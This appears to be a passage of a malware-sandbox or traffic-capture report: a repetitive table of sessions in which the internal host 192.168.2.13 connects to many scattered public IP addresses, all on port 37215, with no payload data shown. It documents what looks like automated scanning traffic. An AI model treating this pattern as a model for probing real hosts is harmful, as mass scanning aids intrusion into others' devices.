                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12500192.168.2.134440458.34.7.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12501192.168.2.1360550197.219.160.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12502192.168.2.1360854157.210.58.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12503192.168.2.1338622130.176.222.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12504192.168.2.1335642197.77.170.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12505192.168.2.1357668109.93.73.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12506192.168.2.133409441.93.162.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12507192.168.2.1351682197.105.190.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12508192.168.2.1333344157.107.59.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12509192.168.2.1341034157.36.224.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12510192.168.2.1337616211.57.184.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12511192.168.2.1353674223.172.68.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12512192.168.2.1358812157.213.94.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12513192.168.2.1357802197.155.176.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12514192.168.2.134961654.54.116.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12515192.168.2.1347710194.17.172.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12516192.168.2.1357524157.148.68.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12517192.168.2.1337208157.111.71.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12518192.168.2.134970841.36.59.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12519192.168.2.1354610157.122.10.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12520192.168.2.135251041.10.208.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12521192.168.2.134044441.109.45.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12522192.168.2.1357620197.147.66.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12523192.168.2.134296241.241.205.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12524192.168.2.134896850.175.128.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12525192.168.2.1335178157.86.179.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12526192.168.2.135002841.96.124.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12527192.168.2.1336164197.238.233.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12528192.168.2.134582641.74.44.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12529192.168.2.133832447.221.181.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12530192.168.2.1346662197.223.3.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12531192.168.2.135315240.196.144.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12532192.168.2.1336836197.139.124.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12533192.168.2.133964841.61.136.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12534192.168.2.134875841.48.168.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12535192.168.2.134640641.49.243.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12536192.168.2.134083441.24.128.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12537192.168.2.1335740197.122.213.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12538192.168.2.1333290101.55.44.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12539192.168.2.1332940157.232.27.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12540192.168.2.1341458197.42.39.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12541192.168.2.1340028157.98.187.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12542192.168.2.134370041.129.154.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12543192.168.2.1336064157.14.52.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12544192.168.2.135566241.184.104.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12545192.168.2.1357452163.48.95.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12546192.168.2.1337402157.194.41.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12547192.168.2.1352310157.124.53.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12548192.168.2.1342572157.186.90.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12549192.168.2.1347296146.51.147.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12550192.168.2.136020441.176.218.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12551192.168.2.135160441.6.16.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12552192.168.2.134573641.18.96.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12553192.168.2.1360546157.4.115.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12554192.168.2.1353426157.63.194.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12555192.168.2.135602641.12.14.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12556192.168.2.135816441.216.11.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12557192.168.2.133611041.1.21.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12558192.168.2.1346450157.192.201.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12559192.168.2.1342558157.253.114.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12560192.168.2.1350232197.192.250.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12561192.168.2.135601241.112.15.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12562192.168.2.1340974157.247.14.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12563192.168.2.1355530194.139.185.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12564192.168.2.1348986197.145.54.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12565192.168.2.134364241.122.147.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12566192.168.2.135945041.10.243.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12567192.168.2.1340314197.175.111.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12568192.168.2.1339260172.39.27.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12569192.168.2.1334550157.73.91.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12570192.168.2.1340674128.132.202.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12571192.168.2.1341238157.23.202.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12572192.168.2.1333764197.12.40.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12573192.168.2.1359064197.192.246.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12574192.168.2.1347394157.9.62.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12575192.168.2.135276241.193.100.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12576192.168.2.1338582157.16.153.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12577192.168.2.135853041.245.172.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12578192.168.2.1334006197.148.234.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12579192.168.2.1338950157.30.35.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12580192.168.2.1338260157.107.134.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12581192.168.2.1360788157.7.134.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12582192.168.2.133784041.145.132.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12583192.168.2.1333918157.121.1.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12584192.168.2.1349632157.202.220.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12585192.168.2.135932241.86.88.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12586192.168.2.135102664.116.79.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12587192.168.2.134474441.216.133.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12588192.168.2.1351812157.186.203.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12589192.168.2.1337236157.66.204.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12590192.168.2.1340532197.125.23.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12591192.168.2.1351362197.78.105.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12592192.168.2.1350052157.225.37.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12593192.168.2.134163441.196.38.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12594192.168.2.1346880157.27.253.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12595192.168.2.135615241.46.73.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12596192.168.2.135607441.41.185.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12597192.168.2.1360364157.224.87.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12598192.168.2.1348032197.164.141.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12599192.168.2.1351806157.218.2.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12600192.168.2.1334452197.84.144.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12601192.168.2.1339988205.218.158.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12602192.168.2.1346288197.165.17.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12603192.168.2.135355841.202.130.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12604192.168.2.1340450197.119.53.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12605192.168.2.1353936197.133.99.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12606192.168.2.1346034157.206.110.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12607192.168.2.135554641.8.17.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12608192.168.2.1334068157.154.185.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12609192.168.2.1344062130.203.3.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12610192.168.2.1344310197.228.131.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12611192.168.2.1346052157.170.96.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12612192.168.2.135025241.195.209.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12613192.168.2.1344282157.100.47.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12614192.168.2.134266814.116.153.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12615192.168.2.1335906197.229.144.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12616192.168.2.1335704197.136.158.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12617192.168.2.135446241.217.41.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12618192.168.2.1337252154.99.187.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12619192.168.2.135646487.205.229.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12620192.168.2.1357260197.32.236.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12621192.168.2.1357960157.20.187.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12622192.168.2.134909041.140.84.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12623192.168.2.134934247.26.14.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12624192.168.2.1336704207.122.25.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12625192.168.2.1357622157.246.229.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12626192.168.2.1354254157.47.126.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12627192.168.2.133392841.158.222.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12628192.168.2.1351508197.190.55.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12629192.168.2.1343092157.182.47.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12630192.168.2.1350868175.0.9.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12631192.168.2.1332988197.141.18.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12632192.168.2.1349974197.84.186.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12633192.168.2.1336270141.93.46.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12634192.168.2.1343688157.129.139.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12635192.168.2.1350768197.220.3.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12636192.168.2.1345138157.121.20.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12637192.168.2.1346940157.66.29.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12638192.168.2.135312041.68.237.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12639192.168.2.135249869.176.119.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12640192.168.2.1352096197.27.149.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12641192.168.2.135632841.138.244.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12642192.168.2.133507474.43.213.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12643192.168.2.1355208157.16.140.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12644192.168.2.1359752157.109.181.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12645192.168.2.135019441.239.97.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12646192.168.2.134058818.124.82.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12647192.168.2.1336350157.227.162.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12648192.168.2.1339550157.222.93.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12649192.168.2.134506841.78.199.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12650192.168.2.1359162197.20.142.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12651192.168.2.133885217.236.181.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12652192.168.2.133748232.76.91.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12653192.168.2.1349304157.132.181.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12654192.168.2.135478841.226.115.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12655192.168.2.1347434145.173.161.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12656192.168.2.136025841.62.219.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12657192.168.2.1337936157.44.161.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12658192.168.2.1337512157.65.20.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12659192.168.2.1338748157.101.31.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12660192.168.2.135504641.76.21.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12661192.168.2.1348996157.23.10.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12662192.168.2.135957041.124.193.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12663192.168.2.1337344197.111.112.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12664192.168.2.1352732128.95.104.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12665192.168.2.134289441.189.116.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12666192.168.2.1340478171.188.75.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12667192.168.2.1347578157.252.105.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12668192.168.2.1345876197.151.29.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12669192.168.2.1354924195.214.30.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12670192.168.2.1337160157.215.246.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12671192.168.2.133607641.157.248.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12672192.168.2.135306660.139.157.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12673192.168.2.1337184197.83.121.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12674192.168.2.133576889.186.130.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12675192.168.2.13484161.13.141.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12676192.168.2.134237032.26.153.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12677192.168.2.1357018157.244.109.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12678192.168.2.133473441.0.59.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12679192.168.2.135440480.62.11.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12680192.168.2.133881641.197.215.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12681192.168.2.135061441.128.73.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12682192.168.2.133991641.44.161.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12683192.168.2.1354908197.149.59.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12684192.168.2.135806641.10.9.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12685192.168.2.1355194157.86.167.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12686192.168.2.1341248197.159.159.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12687192.168.2.1341028157.173.20.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12688192.168.2.135312241.227.242.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12689192.168.2.1337486197.74.176.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12690192.168.2.1354586157.227.77.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12691192.168.2.1345056157.164.52.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12692192.168.2.133687041.111.34.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12693192.168.2.1351344157.152.95.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12694192.168.2.134436441.247.91.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12695192.168.2.1350886154.237.138.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12696192.168.2.1360094167.98.199.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12697192.168.2.1351500157.238.25.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12698192.168.2.1350344197.128.103.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12699192.168.2.1340086157.232.167.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12700192.168.2.1336720121.232.127.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12701192.168.2.1334982197.166.24.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12702192.168.2.1345094197.79.10.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12703192.168.2.1343544157.234.28.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12704192.168.2.135821641.80.216.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12705192.168.2.135179641.15.130.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12706192.168.2.1359540157.144.113.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12707192.168.2.134560241.198.0.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12708192.168.2.1345838197.244.192.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
